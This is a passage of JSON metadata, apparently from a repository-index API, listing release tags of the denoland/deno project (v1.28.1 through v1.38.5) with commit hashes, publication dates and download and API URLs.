ub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"